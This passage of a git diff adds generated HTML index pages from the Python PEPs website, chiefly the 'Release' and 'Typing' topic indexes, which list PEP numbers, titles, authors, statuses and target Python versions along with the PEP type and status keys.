PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/topic/release/index.html b/topic/release/index.html new file mode 100644 index 00000000000..0cccd084838 --- /dev/null +++ b/topic/release/index.html @@ -0,0 +1,316 @@ + + + + + + + + Release PEPs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Release PEPs

+
+

Introduction

+

This is the index of all Python Enhancement Proposals (PEPs) labelled +under the ‘Release’ topic. This is a sub-index of PEP 0, +the PEP index.

+

A PEP is written to specify the release cycle for each feature release of Python. +See the developer’s guide for more information.

+
+
+

Index by Category

+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IA596Python 3.9 Release ScheduleŁukasz Langa3.9
IA619Python 3.10 Release SchedulePablo Galindo Salgado3.10
IA664Python 3.11 Release SchedulePablo Galindo Salgado3.11
IA693Python 3.12 Release ScheduleThomas Wouters3.12
IA719Python 3.13 Release ScheduleThomas Wouters3.13
IA745Python 3.14 Release ScheduleHugo van Kemenade3.14
+
+
+

Historical Meta-PEPs and Informational PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IF160Python 1.6 Release ScheduleFred L. Drake, Jr.1.6
IF200Python 2.0 Release ScheduleJeremy Hylton2.0
IF226Python 2.1 Release ScheduleJeremy Hylton2.1
IF251Python 2.2 Release ScheduleBarry Warsaw, Guido van Rossum2.2
IF283Python 2.3 Release ScheduleGuido van Rossum2.3
IF320Python 2.4 Release ScheduleBarry Warsaw, Raymond Hettinger, Anthony Baxter2.4
IF356Python 2.5 Release ScheduleNeal Norwitz, Guido van Rossum, Anthony Baxter2.5
IF361Python 2.6 and 3.0 Release ScheduleNeal Norwitz, Barry Warsaw2.6, 3.0
IF373Python 2.7 Release ScheduleBenjamin Peterson2.7
IF375Python 3.1 Release ScheduleBenjamin Peterson3.1
IF392Python 3.2 Release ScheduleGeorg Brandl3.2
IF398Python 3.3 Release ScheduleGeorg Brandl3.3
IF404Python 2.8 Un-release ScheduleBarry Warsaw2.8
IF429Python 3.4 Release ScheduleLarry Hastings3.4
IF478Python 3.5 Release ScheduleLarry Hastings3.5
IF494Python 3.6 Release ScheduleNed Deily3.6
IF537Python 3.7 Release ScheduleNed Deily3.7
IF569Python 3.8 Release ScheduleŁukasz Langa3.8
+
+
+
+

PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+ +
+ +
+ + + + + \ No newline at end of file diff --git a/topic/typing/index.html b/topic/typing/index.html new file mode 100644 index 00000000000..ceb9fcc9e0a --- /dev/null +++ b/topic/typing/index.html @@ -0,0 +1,478 @@ + + + + + + + + Typing PEPs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

Typing PEPs

+
+

Introduction

+

This is the index of all Python Enhancement Proposals (PEPs) labelled +under the ‘Typing’ topic. This is a sub-index of PEP 0, +the PEP index.

+

Many recent PEPs propose changes to Python’s static type system +or otherwise relate to type annotations. +They are listed here for reference.

+
+
+

Index by Category

+
+

Process and Meta-PEPs

+ + + + + + + + + + + + + + + +
PEPTitleAuthors
PA729Typing governance processJelle Zijlstra, Shantanu Jain
+
+
+

Other Informational PEPs

+ + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
IF482Literature Overview for Type HintsŁukasz Langa
IF483The Theory of Type HintsGuido van Rossum, Ivan Levkivskyi
+
+
+

Accepted PEPs (accepted; may not be implemented yet)

+ + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SA563Postponed Evaluation of AnnotationsŁukasz Langa3.7
SA649Deferred Evaluation Of Annotations Using DescriptorsLarry Hastings3.14
+
+
+

Open PEPs (under consideration)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
S718Subscriptable functionsJames Hilton-Balfe3.13
S727Documentation in Annotated MetadataSebastián Ramírez3.13
S728TypedDict with Typed Extra ItemsZixuan James Li3.14
S746Type checking Annotated metadataAdrian Garcia Badaracco3.14
S747Annotating Type FormsDavid Foster, Eric Traut3.14
S749Implementing PEP 649Jelle Zijlstra3.14
S767Annotating Read-Only AttributesEneg3.14
+
+
+

Finished PEPs (done, with a stable interface)

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SF484Type HintsGuido van Rossum, Jukka Lehtosalo, Łukasz Langa3.5
SF526Syntax for Variable AnnotationsRyan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum3.6
SF544Protocols: Structural subtyping (static duck typing)Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa3.8
SF560Core support for typing module and generic typesIvan Levkivskyi3.7
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF585Type Hinting Generics In Standard CollectionsŁukasz Langa3.9
SF586Literal TypesMichael Lee, Ivan Levkivskyi, Jukka Lehtosalo3.8
SF589TypedDict: Type Hints for Dictionaries with a Fixed Set of KeysJukka Lehtosalo3.8
SF591Adding a final qualifier to typingMichael J. Sullivan, Ivan Levkivskyi3.8
SF593Flexible function and variable annotationsTill Varoquaux, Konstantin Kashin3.9
SF604Allow writing union types as X | YPhilippe PRADOS, Maggie Moss3.10
SF612Parameter Specification VariablesMark Mendoza3.10
SF613Explicit Type AliasesShannon Zhu3.10
SF646Variadic GenericsMark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles3.11
SF647User-Defined Type GuardsEric Traut3.10
SF655Marking individual TypedDict items as required or potentially-missingDavid Foster3.11
SF673Self TypePradeep Kumar Srinivasan, James Hilton-Balfe3.11
SF675Arbitrary Literal String TypePradeep Kumar Srinivasan, Graham Bleaney3.11
SF681Data Class TransformsErik De Bonte, Eric Traut3.11
SF688Making the buffer protocol accessible in PythonJelle Zijlstra3.12
SF692Using TypedDict for more precise **kwargs typingFranek Magiera3.12
SF695Type Parameter SyntaxEric Traut3.12
SF696Type Defaults for Type ParametersJames Hilton-Balfe3.13
SF698Override Decorator for Static TypingSteven Troxler, Joshua Xu, Shannon Zhu3.12
SF702Marking deprecations using the type systemJelle Zijlstra3.13
SF705TypedDict: Read-only itemsAlice Purcell3.13
SF742Narrowing types with TypeIsJelle Zijlstra3.13
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
SR677Callable Type SyntaxSteven Troxler, Pradeep Kumar Srinivasan3.11
SW724Stricter Type GuardsRich Chiodo, Eric Traut, Erik De Bonte3.13
+
+
+
+

PEP Types Key

+
    +
  • IInformational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
  • +
  • PProcess: Normative PEP describing or proposing a change to a Python community process, workflow or governance
  • +
  • SStandards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem
  • +
+

More info in PEP 1.

+
+
+

PEP Status Key

+
    +
  • AAccepted: Normative proposal accepted for implementation
  • +
  • AActive: Currently valid informational guidance, or an in-use process
  • +
  • DDeferred: Inactive draft that may be taken up again at a later time
  • +
  • <No letter>Draft: Proposal under active discussion and revision
  • +
  • FFinal: Accepted and implementation complete, or no longer active
  • +
  • PProvisional: Provisionally accepted but additional feedback needed
  • +
  • RRejected: Formally declined and will not be accepted
  • +
  • SSuperseded: Replaced by another succeeding PEP
  • +
  • WWithdrawn: Removed from consideration by sponsor or authors
  • +
+

More info in PEP 1.

+
+
+ +
+ +
+ + + + + \ No newline at end of file